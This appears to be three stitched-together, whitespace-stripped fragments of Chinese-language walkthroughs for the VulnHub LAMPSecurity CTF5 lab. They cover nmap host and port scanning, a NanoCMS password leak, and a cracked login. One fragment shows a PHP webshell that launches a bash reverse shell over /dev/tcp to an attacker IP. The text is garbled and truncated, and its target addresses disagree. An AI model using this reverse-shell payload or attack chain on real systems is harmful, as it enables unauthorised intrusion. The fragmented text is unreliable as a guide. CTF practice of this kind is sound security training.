https://www.vulnhub.com/entry/lampsecurity-ctf5,84/主机发现端口扫描探测存活主机，139为靶机nmap-sP192.168.75.0/24StartingNmap7.93(https://nmap.org)at2024-09-2317:27CSTNmapscanreportfor192.168.75.1Hostisup(0.00049slatency).MACAddres

暴露了很多端口80端口发现是nanocms、查询exploithttp://192.168.200.144/~andy/data/pagesdata.txt会暴露密码searchsploitnanocms那个根本利用不了的破解密码得出shannon进入cms添加一句话马，执行<?phpexec("/bin/bash-c'bash-i>&/dev/tcp/192.168.1.121/12340>

vulnhub-LAMPSECURITY:CTF5信息收集端口扫描nmap-sT--min-rate10000-p-192.168.157.164详细扫描sudonmap-sT-sC-sV-O-p22,25,80,110,111,139,143,445,901,3306,44699192.168.157.164漏洞探测sudonmap--script=vulnp22,25,80,110,111,139,143,445,901